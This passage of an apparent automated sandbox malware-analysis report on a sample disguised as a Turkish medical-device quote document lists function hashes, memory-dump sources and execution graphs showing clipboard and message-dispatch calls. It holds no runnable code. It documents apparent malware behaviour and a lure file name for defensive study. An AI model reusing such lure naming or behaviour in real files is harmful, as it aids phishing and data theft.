                                                                                                                          • Opcode Fuzzy Hash: dd6fd51580c386e1b269433f9e92738eee932d64b1f485a31534eec3e267ed36
                                                                                                                          • Instruction Fuzzy Hash: E2C08CB104438A8BCA006BF8B60D32833A96720302F440010DA0945820CFA48094CA65
                                                                                                                          Function 0765BCB0 Relevance: .0, Instructions: 10COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 671f980a5fea54439b63b4decac2154f430f7466e1164e5e7e796256354d0b8e
                                                                                                                          • Instruction ID: 659490f6e7a26511623594d88f02bdb67fa15551e5bcf4eea706557591f5c016
                                                                                                                          • Opcode Fuzzy Hash: 671f980a5fea54439b63b4decac2154f430f7466e1164e5e7e796256354d0b8e
                                                                                                                          • Instruction Fuzzy Hash: D5D012B1418190DFC700CB91DDD9C493FF0BE1E2017051989D4069B222D330A411DF40
                                                                                                                          Function 0765C2F0 Relevance: .0, Instructions: 9COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: c62f63c085d130a473feced78857c6160b09b0bb8a3c5803c24c34f7926fe695
                                                                                                                          • Instruction ID: f8b847b95c2b363576950de309025b5ad5574135094f8731939856d3e2265c48
                                                                                                                          • Opcode Fuzzy Hash: c62f63c085d130a473feced78857c6160b09b0bb8a3c5803c24c34f7926fe695
                                                                                                                          • Instruction Fuzzy Hash: 9AB012E407C30FCEC60831D4202B23A362C7347A00F000016AE0F70800D941145330B3
                                                                                                                          Function 06229228 Relevance: .0, Instructions: 9COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1345581606.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_6220000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 1d6f2623337c38ef8749255ff78b3cbedb78fba73e040c9434c39499d8169e63
                                                                                                                          • Instruction ID: 61412fa5721fa0801f19765b42d0f6ac58f054d2697597a3f249e516f761f0d5
                                                                                                                          • Opcode Fuzzy Hash: 1d6f2623337c38ef8749255ff78b3cbedb78fba73e040c9434c39499d8169e63
                                                                                                                          • Instruction Fuzzy Hash: 87C00235140108AFC740DF55D445D95BBA9EB59660B1180A1F9484B722C632E9119A90
                                                                                                                          Function 0765770C Relevance: .0, Instructions: 8COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 359f5a60e3a074f44f978192a28e769134efa0c31a61c19345873c7e752e17f9
                                                                                                                          • Instruction ID: ec8815e89cf22e476e83ea9be66a32b690de12dc3e7a7d85bb0f7e45cbb60318
                                                                                                                          • Opcode Fuzzy Hash: 359f5a60e3a074f44f978192a28e769134efa0c31a61c19345873c7e752e17f9
                                                                                                                          • Instruction Fuzzy Hash: DBB012B55A8600F39000A3E08C99B3B59D0ABB2710F80EF153B0E10060C571442AF22B
                                                                                                                          Function 0765B9C1 Relevance: .0, Instructions: 8COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 5da4565144c5570fc390908ac7a74ed5be4faa776dde7a1f3127f7fb6fa04dc3
                                                                                                                          • Instruction ID: b8906000bf4e9f9658a326a4faee870ecbde059ef2e769a6165ee26e56532508
                                                                                                                          • Opcode Fuzzy Hash: 5da4565144c5570fc390908ac7a74ed5be4faa776dde7a1f3127f7fb6fa04dc3
                                                                                                                          • Instruction Fuzzy Hash: 16C04CB0BA4259AFDB118A51EF8A96C76B66B16A01F110514AA076A194D66049029E40
                                                                                                                          Function 07656690 Relevance: .0, Instructions: 7COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: a9afeae7b5ae47b7f2c4cec95e03d26cd7f21f7603683bf54829d5b94a3e75f9
                                                                                                                          • Instruction ID: 45539aaec3d9193abc9a9e84466747d9f92a7462136217d8af0a7b7da746e2da
                                                                                                                          • Opcode Fuzzy Hash: a9afeae7b5ae47b7f2c4cec95e03d26cd7f21f7603683bf54829d5b94a3e75f9
                                                                                                                          • Instruction Fuzzy Hash: 67A011A002C30CCA02002380F00C03ABB3C2022A0CF800200EE0B28000EAA23832E88B

                                                                                                                          Non-executed Functions

                                                                                                                          Function 062211F8 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1345581606.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_6220000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: d
                                                                                                                          • API String ID: 0-2564639436
                                                                                                                          • Opcode ID: 16741658b866149483b8bd5c9590fec2c4cfa787c31f47c378aff0260333837b
                                                                                                                          • Instruction ID: 43d7810a492216628e22882025edebd6e4e437127cb698b5607a3a82a5216f97
                                                                                                                          • Opcode Fuzzy Hash: 16741658b866149483b8bd5c9590fec2c4cfa787c31f47c378aff0260333837b
                                                                                                                          • Instruction Fuzzy Hash: B151F570D14629DFDB29DF66C8047DEBBB2AB89310F5081EAD81CA7254DB305A82CF50
                                                                                                                          Function 0622123B Relevance: 1.4, Strings: 1, Instructions: 125COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1345581606.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_6220000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: d
                                                                                                                          • API String ID: 0-2564639436
                                                                                                                          • Opcode ID: 5148c1f5a30798468daeb53398fcd2067b5814f0150f4ce6976b10e163f65690
                                                                                                                          • Instruction ID: 9609e469292e5f5f34b9c68af2e9e0b3acfd2b50409196946db9667b4432cbc1
                                                                                                                          • Opcode Fuzzy Hash: 5148c1f5a30798468daeb53398fcd2067b5814f0150f4ce6976b10e163f65690
                                                                                                                          • Instruction Fuzzy Hash: D651D274E14629DFDB28DF66CC047DEBBB2BB89300F4081AAD91CA7254DB345A86CF51
                                                                                                                          Function 079A4B40 Relevance: .3, Instructions: 312COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346723672.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_79a0000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 22fcb5760c625dbd995b7c523615df23a2f702ea4672436d8c3c12742a75aa74
                                                                                                                          • Instruction ID: a6c43f0feec3c1f9a02e797606c2a5c657cdfc281e0908ba0bacf6784ab096ec
                                                                                                                          • Opcode Fuzzy Hash: 22fcb5760c625dbd995b7c523615df23a2f702ea4672436d8c3c12742a75aa74
                                                                                                                          • Instruction Fuzzy Hash: FDE128B4E0025A9FDB14DFA8C580AAEFBF2BF89304F248169D415AB355D770AD41CFA1
                                                                                                                          Function 079A4F78 Relevance: .3, Instructions: 312COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346723672.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_79a0000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 8897a53bbd4d89916016d003af87e6efdc42ab3efe30f7cf68eab2dbf6005b3b
                                                                                                                          • Instruction ID: ed46fd09d7db3f97d0b467c3ce28b4305a792298da29a5f3ada6f3ad30d5c33e
                                                                                                                          • Opcode Fuzzy Hash: 8897a53bbd4d89916016d003af87e6efdc42ab3efe30f7cf68eab2dbf6005b3b
                                                                                                                          • Instruction Fuzzy Hash: 97E11AB4E002199FDB14DFA9C580AAEFBF2BF89304F248169D415AB355DB70AD41CFA1
                                                                                                                          Function 079A3498 Relevance: .3, Instructions: 312COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346723672.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_79a0000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 0af264bb714d46fc7ab04b64775f9915a6521eef7f0097c887dfd34455d950b7
                                                                                                                          • Instruction ID: 5425d22ae87dbaa462b6e56f25ee55aaf34b16e25ed794613c9b6e667fe46c19
                                                                                                                          • Opcode Fuzzy Hash: 0af264bb714d46fc7ab04b64775f9915a6521eef7f0097c887dfd34455d950b7
                                                                                                                          • Instruction Fuzzy Hash: CDE11BB4E1021A9FDB14DFA9C580AAEFBF2BF89304F248169D415AB355D730AD41CFA1
                                                                                                                          Function 079A2C28 Relevance: .3, Instructions: 312COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346723672.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_79a0000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: ad6c950f5cd0007623e61bf15a13682de3e1e968cce4f83ad793499d8e580301
                                                                                                                          • Instruction ID: e8c09df3832a0d6176d1e8dda25bb49d3d6248d3504d259a4b250feabf177206
                                                                                                                          • Opcode Fuzzy Hash: ad6c950f5cd0007623e61bf15a13682de3e1e968cce4f83ad793499d8e580301
                                                                                                                          • Instruction Fuzzy Hash: 2DE119B4E0021A9FDB14DFA8C580AAEFBF2BF89304F248169D415AB355D730AD41CFA1
                                                                                                                          Function 079A3060 Relevance: .3, Instructions: 312COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346723672.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_79a0000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 72cd84539a6082e46c96364f117a47fdf4fb19846f4db5e47c8d5d7e0d663fdc
                                                                                                                          • Instruction ID: 3e9dfd4a2412afa36f88dc1575687845a1641bda36e166c8650dd4e361b12a5f
                                                                                                                          • Opcode Fuzzy Hash: 72cd84539a6082e46c96364f117a47fdf4fb19846f4db5e47c8d5d7e0d663fdc
                                                                                                                          • Instruction Fuzzy Hash: 11E10AB4E0021A9FDB14DFA9C580AAEFBF2BF49304F248169D415AB355DB31AD41CFA1
                                                                                                                          Function 0125E124 Relevance: .3, Instructions: 264COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1339707072.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_1250000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 4fbcd4f079e1bd72ac1f1b86afbb6dcc36887c10df2b5c911462e3da70dd4a60
                                                                                                                          • Instruction ID: aa8417fb51fc58d54b600b360acbc433af32afc52dbda89a7700e18b85c8da6e
                                                                                                                          • Opcode Fuzzy Hash: 4fbcd4f079e1bd72ac1f1b86afbb6dcc36887c10df2b5c911462e3da70dd4a60
                                                                                                                          • Instruction Fuzzy Hash: BDA16032E202168FCF15DFB4D9845EEBBB2FF85300B15856AED05AB265DB71D906CB80
                                                                                                                          Function 079A4B2F Relevance: .1, Instructions: 142COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346723672.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_79a0000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 6be73ff201bcda23707670568670de1ce5398a8e79b35dafad5226666703612f
                                                                                                                          • Instruction ID: 4a422784bb4b5d776ef082afb52c6217d0576552129b9ab7dc0052dfa47e97e4
                                                                                                                          • Opcode Fuzzy Hash: 6be73ff201bcda23707670568670de1ce5398a8e79b35dafad5226666703612f
                                                                                                                          • Instruction Fuzzy Hash: E8512BB0E012598FDB14DFA9C5806AEBBF2BF89305F248169D418AB355D7709941CFA1
                                                                                                                          Function 079A3489 Relevance: .1, Instructions: 131COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346723672.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_79a0000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 6f9a916ffe2cb9b6fefb6172b3a1d7c21f4087ca77b4b8b75c68bf2c11d698f8
                                                                                                                          • Instruction ID: b0a146e9f3d6ac314e2893227554045dcbd03611738a65c708d1ac81a3d80d83
                                                                                                                          • Opcode Fuzzy Hash: 6f9a916ffe2cb9b6fefb6172b3a1d7c21f4087ca77b4b8b75c68bf2c11d698f8
                                                                                                                          • Instruction Fuzzy Hash: 9A5129B4E0021A9FDB14CFA9C5846AEFBF2BF89304F24C169D418AB355DB309941CFA1

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:10.8%
                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                          Signature Coverage:0%
                                                                                                                          Total number of Nodes:66
                                                                                                                          Total number of Limit Nodes:9
                                                                                                                          execution_graph 25530 f3ccb0 25531 f3ccb8 25530->25531 25532 f3cccc 25531->25532 25536 f3ccf8 25531->25536 25548 f3cce8 25531->25548 25533 f3cce1 25537 f3cd0a 25536->25537 25538 f3cd25 25537->25538 25540 f3cd69 25537->25540 25544 f3ccf8 OleGetClipboard 25538->25544 25545 f3cce8 OleGetClipboard 25538->25545 25560 f3cdb1 25538->25560 25539 f3cd2b 25539->25533 25542 f3cde9 25540->25542 25566 f3ced0 25540->25566 25570 f3cec0 25540->25570 25541 f3ce07 25541->25533 25542->25533 25544->25539 25545->25539 25549 f3cd0a 25548->25549 25550 f3cd25 25549->25550 25552 f3cd69 25549->25552 25555 f3cdb1 OleGetClipboard 25550->25555 25556 f3ccf8 OleGetClipboard 25550->25556 25557 f3cce8 OleGetClipboard 25550->25557 25551 f3cd2b 25551->25533 25554 f3cde9 25552->25554 25558 f3ced0 OleGetClipboard 25552->25558 25559 f3cec0 OleGetClipboard 25552->25559 25553 f3ce07 25553->25533 25554->25533 25555->25551 25556->25551 25557->25551 25558->25553 25559->25553 25561 f3cdd0 25560->25561 25563 f3cde9 25561->25563 25564 f3ced0 OleGetClipboard 25561->25564 25565 f3cec0 OleGetClipboard 25561->25565 25562 f3ce07 25562->25539 25563->25539 25564->25562 25565->25562 25568 f3cee5 25566->25568 25569 f3cf0b 25568->25569 25574 f3ca9c 25568->25574 25569->25541 25572 f3cee5 25570->25572 25571 f3ca9c OleGetClipboard 25571->25572 25572->25571 25573 f3cf0b 25572->25573 25573->25541 25575 f3cf78 OleGetClipboard 25574->25575 25577 f3d012 25575->25577 25578 f30690 25579 f306b5 25578->25579 25580 f308c9 25579->25580 25582 f303d0 OleInitialize 25579->25582 25584 f308f4 25579->25584 25580->25584 25587 f303d0 25580->25587 25582->25580 25583 f308e1 25583->25584 25591 f3b620 25583->25591 25595 f3b630 25583->25595 25589 f303db 25587->25589 25588 f3acc1 25588->25583 25589->25588 25599 f3a1e4 25589->25599 25592 f3b695 25591->25592 25593 f3b6e2 25592->25593 25606 f3b238 25592->25606 25593->25584 25596 f3b695 25595->25596 25597 f3b238 DispatchMessageW 25596->25597 25598 f3b6e2 25596->25598 25597->25596 25598->25584 25600 f3a1ef 25599->25600 25601 f3afdb 25600->25601 25603 f3a200 25600->25603 25601->25588 25604 f3b010 OleInitialize 25603->25604 25605 f3b074 25604->25605 25605->25601 25607 f3c380 DispatchMessageW 25606->25607 25608 f3c3ec 25607->25608 25608->25592

                                                                                                                          Executed Functions

                                                                                                                          Function 01246FC8 Relevance: 5.4, Strings: 4, Instructions: 449COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 143 1246fc8-1246ffe 144 1247006-124700c 143->144 274 1247000 call 1246fc7 143->274 275 1247000 call 1246fc8 143->275 276 1247000 call 1247118 143->276 145 124705c-1247060 144->145 146 124700e-1247012 144->146 147 1247077-124708b 145->147 148 1247062-1247071 145->148 149 1247014-1247019 146->149 150 1247021-1247028 146->150 153 1247093-124709a 147->153 278 124708d call 124a0f7 147->278 279 124708d call 124a0f8 147->279 151 1247073-1247075 148->151 152 124709d-12470a7 148->152 149->150 154 12470fe-124713b 150->154 155 124702e-1247035 150->155 151->153 157 12470b1-12470b5 152->157 158 12470a9-12470af 152->158 164 1247146-1247166 154->164 165 124713d-1247143 154->165 155->145 156 1247037-124703b 155->156 159 124703d-1247042 156->159 160 124704a-1247051 156->160 161 12470bd-12470f7 157->161 163 12470b7 157->163 158->161 159->160 160->154 166 1247057-124705a 160->166 161->154 163->161 171 124716d-1247174 164->171 172 1247168 164->172 165->164 166->153 175 1247176-1247181 171->175 174 12474fc-1247505 172->174 176 1247187-124719a 175->176 177 124750d-1247519 175->177 184 12471b0-12471cb 176->184 185 124719c-12471aa 176->185 182 124753f-1247540 177->182 183 124751b-1247521 177->183 186 1247547-1247549 183->186 187 1247523-1247536 183->187 193 12471cd-12471d3 184->193 194 12471ef-12471f2 184->194 185->184 192 1247484-124748b 185->192 190 1247552-1247556 186->190 191 124754b-1247550 186->191 187->182 195 124755c-124755d 190->195 191->195 192->174 198 124748d-124748f 192->198 196 12471d5 193->196 197 12471dc-12471df 193->197 199 124734c-1247352 194->199 200 12471f8-12471fb 194->200 196->197 196->199 201 1247212-1247218 196->201 202 124743e-1247441 196->202 197->201 203 12471e1-12471e4 197->203 204 1247491-1247496 198->204 205 124749e-12474a4 198->205 199->202 206 1247358-124735d 199->206 200->199 207 1247201-1247207 200->207 212 124721e-1247220 201->212 213 124721a-124721c 201->213 214 1247447-124744d 202->214 215 1247508 202->215 208 124727e-1247284 203->208 209 12471ea 203->209 204->205 205->177 210 12474a6-12474ab 205->210 206->202 207->199 211 124720d 207->211 208->202 221 124728a-1247290 208->221 209->202 219 12474f0-12474f3 210->219 220 12474ad-12474b2 210->220 211->202 216 124722a-1247233 212->216 213->216 217 1247472-1247476 214->217 218 124744f-1247457 214->218 215->177 225 1247235-1247240 216->225 226 1247246-124726e 216->226 217->192 227 1247478-124747e 217->227 218->177 224 124745d-124746c 218->224 219->215 228 12474f5-12474fa 219->228 220->215 229 12474b4 220->229 222 1247296-1247298 221->222 223 1247292-1247294 221->223 230 12472a2-12472b9 222->230 223->230 224->184 224->217 225->202 225->226 249 1247274-1247279 226->249 250 1247362-1247398 226->250 227->175 227->192 228->174 228->198 231 12474bb-12474c0 229->231 242 12472e4-124730b 230->242 243 12472bb-12472d4 230->243 232 12474e2-12474e4 231->232 233 12474c2-12474c4 231->233 232->215 240 12474e6-12474e9 232->240 237 12474c6-12474cb 233->237 238 12474d3-12474d9 233->238 237->238 238->177 241 12474db-12474e0 238->241 240->219 241->232 245 12474b6-12474b9 241->245 242->215 253 1247311-1247314 242->253 243->250 254 12472da-12472df 243->254 245->215 245->231 249->250 257 12473a5-12473ad 250->257 258 124739a-124739e 250->258 253->215 256 124731a-1247343 253->256 254->250 256->250 273 1247345-124734a 256->273 257->215 261 12473b3-12473b8 257->261 259 12473a0-12473a3 258->259 260 12473bd-12473c1 258->260 259->257 259->260 262 12473e0-12473e4 260->262 263 12473c3-12473c9 260->263 261->202 266 12473e6-12473ec 262->266 267 12473ee-124740d call 12476f8 262->267 263->262 265 12473cb-12473d3 263->265 265->215 268 12473d9-12473de 265->268 266->267 270 1247413-1247417 266->270 267->270 268->202 270->202 271 1247419-1247435 270->271 271->202 273->250 274->144 275->144 276->144 278->153 279->153
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781693751.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_1240000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: (oq$(oq$,q$,q
                                                                                                                          • API String ID: 0-620556200
                                                                                                                          • Opcode ID: 54f9c04b7c277c530cf59bf0061d0574c536b2ddbf497c2fea041f204c2db830
                                                                                                                          • Instruction ID: 5fa73498e765ef299880ad3edfaabcfec5f5363850359ee4e80e8c78c71ea26a
                                                                                                                          • Opcode Fuzzy Hash: 54f9c04b7c277c530cf59bf0061d0574c536b2ddbf497c2fea041f204c2db830
                                                                                                                          • Instruction Fuzzy Hash: 6B025D30A1025ACFDB19CF69D984AADBBB2FF88300F558469E925AB261D730DD41CF91
                                                                                                                          Function 012429EC Relevance: 5.4, Strings: 4, Instructions: 439COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 280 12429ec-12429f6 282 1242981-124298a 280->282 283 12429f8-1242a01 280->283 284 1242990 282->284 283->284 285 1242a03-1242a0c 283->285 288 1242997 284->288 286 1242a0e-1242a3b 285->286 287 1242999 285->287 292 1242a5d-1242aac 286->292 293 1242a3d-1242a5c 286->293 290 12429a0-12429c8 287->290 288->287 297 1242ac7-1242acf 292->297 298 1242aae-1242ab5 292->298 301 1242ad2-1242ae6 297->301 299 1242ab7-1242abc 298->299 300 1242abe-1242ac5 298->300 299->301 300->301 304 1242afc-1242b04 301->304 305 1242ae8-1242aef 301->305 308 1242b06-1242b0a 304->308 306 1242af5-1242afa 305->306 307 1242af1-1242af3 305->307 306->308 307->308 310 1242b0c-1242b21 308->310 311 1242b6a-1242b6d 308->311 310->311 318 1242b23-1242b26 310->318 312 1242bb5-1242bbb 311->312 313 1242b6f-1242b84 311->313 315 12436b6 312->315 316 1242bc1-1242bc3 312->316 313->312 320 1242b86-1242b8a 313->320 323 12436bb-12436f0 315->323 316->315 319 1242bc9-1242bce 316->319 321 1242b45-1242b63 call 12402c8 318->321 322 1242b28-1242b2a 318->322 324 1243664-1243668 319->324 325 1242bd4 319->325 328 1242b92-1242bb0 call 12402c8 320->328 329 1242b8c-1242b90 320->329 321->311 322->321 330 1242b2c-1242b2f 322->330 341 12436f2-1243700 323->341 342 124371f-1243728 323->342 326 124366f-12436b5 324->326 327 124366a-124366d 324->327 325->324 327->323 327->326 328->312 329->312 329->328 330->311 333 1242b31-1242b43 330->333 333->311 333->321 345 1243702-124371c 341->345 346 124372e-1243874 341->346 342->346 345->342 347 12438a6-12438a9 346->347 348 1243876-1243878 346->348 351 12438aa-12438bc 347->351 348->351 352 124387a-1243881 348->352 354 12438ee-12438f4 351->354 355 12438be-12438d1 351->355 352->347 356 12438f6-1243908 354->356 357 1243928-1243930 354->357 355->354 358 124393a-124393d 356->358 359 124390a-124390c 356->359 357->358 361 124393e-1243941 358->361 359->361 362 124390e-1243910 359->362 363 1243942-1243969 361->363 362->363 364 1243912-1243919 362->364 364->357
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781693751.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_1240000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Xq$Xq$Xq$Xq
                                                                                                                          • API String ID: 0-3965792415
                                                                                                                          • Opcode ID: d49aa99ae65f4ccf83b4e12e9286bb85d756b97df30e7454e7f90f64629b0386
                                                                                                                          • Instruction ID: 50c3a0e98f613a28eca14e197e4cdf25f9ab24748cc58045d9c927fafd9ce34c
                                                                                                                          • Opcode Fuzzy Hash: d49aa99ae65f4ccf83b4e12e9286bb85d756b97df30e7454e7f90f64629b0386
                                                                                                                          • Instruction Fuzzy Hash: A2C1BD72E343258BDB2ACB7894423ED7BB5FF7A310F154899D645AB202D7324943CB92
                                                                                                                          Function 012469AF Relevance: 2.9, Strings: 2, Instructions: 448COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
